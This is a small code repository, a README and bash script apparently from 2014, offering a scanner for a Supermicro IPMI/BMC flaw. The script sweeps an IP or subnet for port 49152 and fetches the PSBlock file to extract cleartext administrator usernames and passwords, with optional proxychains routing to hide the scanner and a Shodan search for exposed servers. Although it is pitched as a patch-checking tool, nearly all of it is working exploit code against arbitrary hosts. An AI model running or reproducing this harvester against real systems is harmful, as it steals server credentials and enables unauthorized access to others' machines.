├── README.md └── supermicro_scan.sh /README.md: -------------------------------------------------------------------------------- 1 | Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3 2 | https://crowdshield.com 3 | Usage: sh supermicro_scan.sh [proxy] 4 | 5 | ABOUT: 6 | Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to 7 | request the file PSBlock via port 49152. This plain text password file contains IPMI 8 | username and password information. This script allows users to scan their networks 9 | check for vulnerable systems that require patching. 10 | 11 | USAGE: 12 | ./supermicro_scan.sh 74.200.8.237 - Single host scan 13 | ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy 14 | ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ 15 | 16 | -------------------------------------------------------------------------------- /supermicro_scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Supermicro IPMI/BMC Cleartext Password Scanner v20140625 by 1N3 3 | # (c) https://crowdshield.com 4 | # Usage: sh supermicro_scan.sh [proxy] 5 | # 6 | # ABOUT: 7 | # Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to 8 | # request the file PSBlock via port 49152. This plain text password file contains IPMI 9 | # username and password information. This script allows users to scan their networks 10 | # check for vulnerable systems that require patching. 11 | # 12 | # USAGE: 13 | # ./supermicro_scan.sh 74.200.8.237 - Single host scan 14 | # ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy 15 | # ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ 16 | # 17 | 18 | #clear 19 | echo "+ -- --=[https://crowdshield.com" 20 | echo "+ -- --=[Supermicro IPMI Cleartext Password Scanner by 1N3" 21 | echo "" 22 | 23 | UNICORNSCAN=`which unicornscan` 24 | CURL=`which curl` 25 | PROXYCHAINS=`which proxychains` 26 | TARGET=$1 27 | PROXY=$2 28 | 29 | if [ "$UNICORNSCAN" == "" ]; then 30 | echo "+ -- --=[Unicornscan not installed! Exiting..." 31 | exit 32 | fi 33 | 34 | if [ "$PROXYCHAINS" == "" ]; then 35 | echo "+ -- --=[Proxychains not installed! Continuing scan without proxy support..." 36 | exit 37 | fi 38 | 39 | if [ "$CURL" == "" ]; then 40 | echo "+ -- --=[Curl not installed! Exiting..." 41 | exit 42 | fi 43 | 44 | if [ -z "$1" ]; then 45 | echo "+ -- --=[Usage: $0 [proxy]" 46 | exit 47 | fi 48 | 49 | if [ $TARGET == "shodan" ]; then 50 | # SCAN USING SHODANHQ SEARCH 51 | echo "Searching ShowdanHQ..." 52 | iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 & 53 | exit 54 | fi 55 | 56 | if [ "$PROXY" = "proxy" ]; then 57 | #PROXY ENABLED 58 | echo "+ -- --=[Scanning via proxy..." 59 | # SCAN FOR THE DEFAULT FILES AND PORTS 60 | for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do 61 | echo "+ -- --=[Extracting User/Pass from $a" 62 | echo "+ -- --=[Sending GET http://$a:49152/PSBlock" 63 | proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings 64 | done 65 | exit 66 | 67 | else 68 | # NO PROXY 69 | echo "+ -- --=[Scanning via direct connection..." 70 | # SCAN FOR THE DEFAULT FILES AND PORTS 71 | for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do 72 | echo "+ -- --=[Extracting User/Pass from $a" 73 | echo "+ -- --=[Sending GET http://$a:49152/PSBlock" 74 | curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings 75 | done 76 | exit 77 | 78 | fi 79 | 80 | echo "" 81 | echo "+ -- --=[Scan Complete!" 82 | exit 83 | --------------------------------------------------------------------------------